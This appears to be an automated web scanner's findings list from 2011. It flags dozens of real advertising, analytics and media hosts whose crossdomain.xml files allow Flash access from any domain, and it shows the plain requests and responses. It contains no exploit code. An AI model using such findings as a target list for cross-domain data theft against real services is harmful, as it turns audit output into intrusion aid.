GET /crossdomain.xml HTTP/1.0 Host: event.adxpose.com |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Accept-Ranges: bytes ETag: W/"203-1313179768000" Last-Modified: Fri, 12 Aug 2011 20:09:28 GMT Content-Type: application/xml Content-Length: 203 Date: Sat, 17 Sep 2011 16:39:35 GMT Connection: close <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://events.seattlepi |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: events.seattlepi.com |
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Thu, 26 May 2011 23:14:54 GMT Server: nginx/0.6.39 Date: Sat, 17 Sep 2011 06:07:44 GMT Expires: Sun, 18 Sep 2011 06:07:44 GMT Cache-Control: max-age=86400 Age: 37134 X-Cache: HIT from squid1.admin.zvents.com X-Cache-Lookup: HIT from squid1.admin.zvents.com Via: 1.0 squid1.admin.zvents.com (squid/3.1.4) Proxy-Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://events.stamfo |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: events.stamfordadvocate |
HTTP/1.0 200 OK Server: nginx/0.6.39 Date: Sat, 17 Sep 2011 16:23:09 GMT Content-Type: text/xml Content-Length: 201 Last-Modified: Thu, 16 Jun 2011 17:39:28 GMT Expires: Sun, 18 Sep 2011 16:23:09 GMT Cache-Control: max-age=86400 Accept-Ranges: bytes X-Cache: MISS from squid1.admin.zvents.com X-Cache-Lookup: HIT from squid1.admin.zvents.com Via: 1.0 squid1.admin.zvents.com (squid/3.1.4) Proxy-Connection: keep-alive <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://external.ak.fbcdn |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: external.ak.fbcdn.net |
HTTP/1.0 200 OK Server: Apache ETag: "a27e344a618640558cd Last-Modified: Wed, 15 Jul 2009 00:32:14 GMT Accept-Ranges: bytes Content-Length: 258 Content-Type: application/xml Date: Sat, 17 Sep 2011 16:29:49 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://eyewond.fcod.llnwd |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: eyewond.fcod.llnwd.net |
HTTP/1.0 200 OK Pragma: no-cache Content-Length: 187 Server: FlashCom/4.0.2 Content-Type: application/xml <?xml version="1.0" encoding="utf-8" ?> <cross-domain-policy> <allow-access-from domain="*"/> <site-control permitted-cross-domain </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://fls.doubleclick |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: fls.doubleclick.net |
HTTP/1.0 200 OK Vary: Accept-Encoding Content-Type: text/x-cross-domain Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT Date: Sat, 17 Sep 2011 02:48:16 GMT Expires: Sat, 17 Sep 2011 02:46:06 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Age: 49663 Cache-Control: public, max-age=86400 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <!-- Policy file for http://www.doubleclick <cross-domain-policy> <site- ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://g-pixel.invit |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: g-pixel.invitemedia.com |
HTTP/1.0 200 OK Server: IM BidManager Date: Sat, 17 Sep 2011 16:25:13 GMT Content-Type: text/plain Content-Length: 81 <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://g.msn.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: g.msn.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Thu, 09 Oct 2008 18:52:49 GMT Accept-Ranges: bytes ETag: "fee1eb39402ac91:0" Server: Microsoft-IIS/7.5 Date: Sat, 17 Sep 2011 16:45:17 GMT Connection: keep-alive Content-Length: 104 <?xml version="1.0" ?> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://goku.brightcove |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: goku.brightcove.com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:40:41 GMT Server: Apache Last-Modified: Wed, 04 Nov 2009 14:35:23 GMT Content-Length: 116 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" secure="false" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://hearst.112.2o7.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: hearst.112.2o7.net |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:23:06 GMT Server: Omniture DC/2.0.0 xserver: www408 Connection: close Content-Type: text/html <cross-domain-policy> <allow-access-from domain="*" /> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://hearstmagazines |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: hearstmagazines.112.2o7 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:21:17 GMT Server: Omniture DC/2.0.0 xserver: www415 Content-Length: 137 Keep-Alive: timeout=15 Connection: close Content-Type: text/html <cross-domain-policy> <allow-access-from domain="*" /> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://hfm.checkm8.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: hfm.checkm8.com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:31:41 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: NY-AD2 ETag: "1315710718" Last-Modified: Sun, 11-Sep-2011 03:11:58 GMT Age: 0 Cache-Control: max-age=86400 Content-Length: 106 Vary: Accept-Encoding Connection: close Content-Type: text/xml <?xml version="1.0" ?> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://ib.adnxs.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ib.adnxs.com |
HTTP/1.0 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: policyref="http://cdn Set-Cookie: sess=1; path=/; expires=Sun, 18-Sep-2011 16:24:28 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=-1; path=/; expires=Sat, 04-Sep-2021 16:24:28 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/xml <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://image.ugo.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: image.ugo.com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:29:11 GMT Server: Apache Last-Modified: Wed, 24 Feb 2010 15:50:59 GMT ETag: "6782d-1d2-4805aa1ee3ec0" Accept-Ranges: bytes Content-Length: 466 Cache-Control: max-age=180 Expires: Sat, 17 Sep 2011 16:32:11 GMT Vary: Accept-Encoding Keep-Alive: timeout=390, max=4878 Connection: Keep-Alive Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> <allow-access-from domain="*.ugo.com"/> <allow-access-from domain="*.brightcove.com"/> <allow-access-from domain="*.c.brightcove.com"/> <allow-access-from domain="*.google-analytics.com"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://img.widgets.video |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: img.widgets.video.s-msn |
HTTP/1.0 200 OK Cache-Control: max-age=86400 Content-Type: text/xml Accept-Ranges: bytes ETag: "2b71bb10d242cc1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Content-Length: 170 Date: Sat, 17 Sep 2011 16:28:02 GMT Last-Modified: Fri, 15 Jul 2011 09:32:07 GMT Expires: Sun, 18 Sep 2011 16:28:02 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*"/> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://img1.catalog.video |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: img1.catalog.video.msn |
HTTP/1.0 200 OK Cache-Control: max-age=1209600 Content-Type: text/xml Accept-Ranges: bytes ETag: "1bfbe6a41d40cc1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Content-Length: 177 Age: 634800 Date: Sat, 17 Sep 2011 16:32:42 GMT Last-Modified: Mon, 11 Jul 2011 22:55:35 GMT Expires: Sat, 24 Sep 2011 08:12:42 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://img2.catalog.video |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: img2.catalog.video.msn |
HTTP/1.0 200 OK Cache-Control: max-age=1209600 Content-Type: text/xml Accept-Ranges: bytes ETag: "1bfbe6a41d40cc1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Content-Length: 177 Age: 50754 Date: Sat, 17 Sep 2011 16:34:42 GMT Last-Modified: Mon, 11 Jul 2011 22:55:35 GMT Expires: Sat, 01 Oct 2011 02:28:48 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://img3.catalog.video |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: img3.catalog.video.msn |
HTTP/1.0 200 OK Cache-Control: max-age=1209600 Content-Type: text/xml Accept-Ranges: bytes ETag: "1bfbe6a41d40cc1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Content-Length: 177 Age: 634655 Date: Sat, 17 Sep 2011 16:30:17 GMT Last-Modified: Mon, 11 Jul 2011 22:55:35 GMT Expires: Sat, 24 Sep 2011 08:12:42 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://img4.catalog.video |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: img4.catalog.video.msn |
HTTP/1.0 200 OK Cache-Control: max-age=1209600 Content-Type: text/xml Accept-Ranges: bytes ETag: "1bfbe6a41d40cc1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Content-Length: 177 Age: 99726 Date: Sat, 17 Sep 2011 16:32:17 GMT Last-Modified: Mon, 11 Jul 2011 22:55:35 GMT Expires: Fri, 30 Sep 2011 12:50:10 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://js.revsci.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: js.revsci.net |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: application/xml Date: Sat, 17 Sep 2011 16:27:38 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- allow Flash 7+ players to invoke JS from this server --> <cross-domain-po ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://load.exelator.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: load.exelator.com |
HTTP/1.0 200 OK Content-Type: text/xml Accept-Ranges: bytes ETag: "1452731550" Last-Modified: Thu, 23 Apr 2009 17:36:11 GMT Content-Length: 148 Date: Sat, 17 Sep 2011 16:44:07 GMT Server: HTTP server Connection: close Via: 1.1 AN-AMP_TM uproxy-2 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*" to-ports="*"/> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://load.tubemogul.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: load.tubemogul.com |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Accept-Ranges: bytes ETag: W/"-1-1313195678000" Last-Modified: Sat, 13 Aug 2011 00:34:38 GMT host: rcv-srv30 Content-Type: application/xml Content-Length: 204 Date: Sat, 17 Sep 2011 16:40:55 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-poli ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://loadus.exelator |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: loadus.exelator.com |
HTTP/1.0 200 OK Content-Type: text/xml Accept-Ranges: bytes ETag: "3678660634" Last-Modified: Thu, 23 Apr 2009 17:36:11 GMT Content-Length: 148 Date: Sat, 17 Sep 2011 16:28:17 GMT Server: HTTP server Connection: close Via: 1.1 AN-AMP_TM uproxy-3 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*" to-ports="*"/> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://media.fastclick |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: media.fastclick.net |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:44:04 GMT Server: Apache/2.2.4 (Unix) P3P: policyref="/w3c/p3p.xml", CP="NOI NID DEVo TAIo PSAo HISo OTPo OUR DELo BUS COM NAV INT DSP COR" Content-Length: 202 Keep-Alive: timeout=5, max=19903 Connection: Keep-Alive Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://metrics.elle.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: metrics.elle.com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:38:13 GMT Server: Omniture DC/2.0.0 xserver: www661 Content-Length: 137 Keep-Alive: timeout=15 Connection: close Content-Type: text/html <cross-domain-policy> <allow-access-from domain="*" /> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://metrics.seattlepi |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: metrics.seattlepi.com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:23:36 GMT Server: Omniture DC/2.0.0 xserver: www132 Content-Length: 137 Keep-Alive: timeout=15 Connection: close Content-Type: text/html <cross-domain-policy> <allow-access-from domain="*" /> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.btrll.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: nai.btrll.com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:43:52 GMT Server: Apache/2.0.63 (Unix) Last-Modified: Mon, 08 Aug 2011 19:03:54 GMT ETag: "270012-10d-1bbf7a80" Accept-Ranges: bytes Content-Length: 269 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://o.sa.aol.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: o.sa.aol.com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 17:37:16 GMT Server: Omniture DC/2.0.0 xserver: www27 Connection: close Content-Type: text/html <cross-domain-policy> <allow-access-from domain="*" /> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://omnituretrack |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: omnituretrack.local.com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:28:49 GMT Server: Omniture DC/2.0.0 xserver: www369 Connection: close Content-Type: text/html <cross-domain-policy> <allow-access-from domain="*" /> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://optout.collective |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: optout.collective-media |
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Sat, 17 Sep 2011 16:43:40 GMT Content-Type: text/plain Content-Length: 187 Last-Modified: Thu, 09 Dec 2010 21:18:12 GMT Connection: close Accept-Ranges: bytes <?xml version="1.0" ?> <cross-domain-policy> <allow-access-from domain="*" secure="false"/> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://optout.crwdcntrl |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: optout.crwdcntrl.net |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:44:39 GMT Server: Apache/2.2.8 (CentOS) Last-Modified: Fri, 29 Jul 2011 15:24:18 GMT ETag: "2570256-ba-4a936dffbec80 Accept-Ranges: bytes Content-Length: 186 Vary: Accept-Encoding Connection: close Content-Type: text/xml <?xml version="1.0"?> <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://optout.invitemedia |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: optout.invitemedia.com |
HTTP/1.0 200 OK Server: IM BidManager Date: Sat, 17 Sep 2011 16:44:41 GMT Content-Type: text/plain Content-Length: 81 <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://optout.media6 |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: optout.media6degrees.com |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Accept-Ranges: bytes ETag: W/"288-1307647056000" Last-Modified: Thu, 09 Jun 2011 19:17:36 GMT Content-Type: application/xml Content-Length: 288 Date: Sat, 17 Sep 2011 16:45:11 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-http-request ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://p.brilig.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: p.brilig.com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:43:44 GMT Server: Apache/2.2.14 (Ubuntu) Last-Modified: Wed, 07 Sep 2011 16:35:43 GMT ETag: "55e69-ab-4ac5c890ad5c0" Accept-Ranges: bytes Content-Length: 171 X-Brilig-D: D=68 P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM" Connection: close Content-Type: application/xml <?xml version="1.0" ?> <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*"/> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://pbid.pro-market |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: pbid.pro-market.net |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="NOI DSP COR NID CURa ADMo TAIa PSAo PSDo OUR SAMo BUS UNI PUR COM NAV INT DEM CNT STA PRE LOC" ANServer: tapp3.ny ETag: W/"207-1312809562000" Last-Modified: Mon, 08 Aug 2011 13:19:22 GMT Content-Type: application/xml Content-Length: 207 Date: Sat, 17 Sep 2011 16:43:43 GMT Connection: close <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-poli ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pix04.revsci.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: pix04.revsci.net |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: application/xml Date: Sat, 17 Sep 2011 16:27:54 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- allow Flash 7+ players to invoke JS from this server --> <cross-domain-po ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pixel.adsafep |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: pixel.adsafeprotected.com |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 ETag: W/"202-1314985194000" Last-Modified: Fri, 02 Sep 2011 17:39:54 GMT Content-Type: application/xml Content-Length: 202 Date: Sat, 17 Sep 2011 16:23:45 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-polic ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pixel.fetchback |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: pixel.fetchback.com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 17:18:36 GMT Server: Apache/2.2.3 (CentOS) Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT Accept-Ranges: bytes Content-Length: 213 Vary: Accept-Encoding Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" secure="false"/> </cross-do ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pixel.quantserve |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: pixel.quantserve.com |
HTTP/1.0 200 OK Connection: close Cache-Control: private, no-transform, must-revalidate, max-age=86400 Expires: Sun, 18 Sep 2011 16:23:09 GMT Content-Type: text/xml Content-Length: 207 Date: Sat, 17 Sep 2011 16:23:09 GMT Server: QS <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-po ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://privacy.revsci.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: privacy.revsci.net |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: application/xml Date: Sat, 17 Sep 2011 16:44:17 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- allow Flash 7+ players to invoke JS from this server --> <cross-domain-po ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ps2.newsinc.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ps2.newsinc.com |
HTTP/1.1 200 OK Accept-Ranges: bytes Content-Type: text/xml Date: Sat, 17 Sep 2011 16:23:11 GMT ETag: "069b12745fcc1:0" Last-Modified: Tue, 10 May 2011 19:04:58 GMT NDN-Server: PS01 NDN-SiteVer: 3.2.1 Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Content-Length: 286 Connection: Close <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="*"/> <allow-ht ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://r.skimresources |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: r.skimresources.com |
HTTP/1.1 200 OK Accept-Ranges: bytes Content-Type: text/xml Date: Sat, 17 Sep 2011 16:38:55 GMT ETag: "17c8151-15e-49fb1c5 Last-Modified: Wed, 30 Mar 2011 11:49:44 GMT P3P: policyref="http:/ Server: Apache Vary: Accept-Encoding X-SKIM-Hostname: api02.angel.skimlinks.com Content-Length: 350 Connection: Close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://r.turn.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: r.turn.com |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: private Pragma: private Expires: Sat, 17 Sep 2011 16:46:16 GMT Content-Type: text/xml;charset=UTF-8 Date: Sat, 17 Sep 2011 16:46:15 GMT Connection: close <?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://rad.msn.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: rad.msn.com |
HTTP/1.1 200 OK Cache-Control: max-age=604800 Content-Type: text/xml Last-Modified: Fri, 22 Jul 2011 17:49:14 GMT Accept-Ranges: bytes ETag: "0c969ab9748cc1:0" Server: Microsoft-IIS/7.5 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Access-Control-Allow Date: Sat, 17 Sep 2011 16:27:57 GMT Connection: keep-alive Content-Length: 202 <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://recs.richrelevance |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: recs.richrelevance.com |
HTTP/1.1 200 OK Server: nginx/0.8.54 Date: Sat, 17 Sep 2011 16:46:28 GMT Content-Type: text/plain Content-Length: 108 Last-Modified: Mon, 08 Nov 2010 18:47:33 GMT Connection: close Accept-Ranges: bytes <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://rp.gwallet.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: rp.gwallet.com |
HTTP/1.0 200 OK Content-Length: 207 Server: radiumone/1.2 Content-type: text/xml; charset=UTF-8 P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="*" secure="false"/> </cross-domain- ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://s.meebocdn.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: s.meebocdn.net |
HTTP/1.0 200 OK Last-Modified: Tue, 03 May 2011 00:23:33 GMT ETag: "3934951678" Server: lighttpd/1.4.19 Content-Type: text/xml Cache-Control: max-age=80196 Expires: Sun, 18 Sep 2011 14:52:59 GMT Date: Sat, 17 Sep 2011 16:36:23 GMT Content-Length: 348 Connection: close <cross-domain-policy> <allow-access-from domain="*" secure="False"/> <allow-access-from domain="*.meebo.com" secure="False"/> <allow-http-request <allow-access-from domain="*.meebocdn.net" secure="False"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://s.xp1.ru4.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: s.xp1.ru4.com |
HTTP/1.1 200 OK Server: Sun-Java-System-Web Date: Sat, 17 Sep 2011 16:46:17 GMT P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI" Content-type: text/xml Last-modified: Mon, 22 Nov 2010 21:33:00 GMT Content-length: 202 Etag: "ca-4ceae18c" Accept-ranges: bytes Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://s.ytimg.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: s.ytimg.com |
HTTP/1.0 200 OK Vary: Accept-Encoding Content-Type: text/x-cross-domain Last-Modified: Fri, 27 Aug 2010 02:31:32 GMT Date: Fri, 16 Sep 2011 02:45:19 GMT Expires: Fri, 23 Sep 2011 02:45:19 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Cache-Control: public, max-age=604800 Age: 136897 <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://s0.2mdn.net |
Path: | /crossdomain.xml |
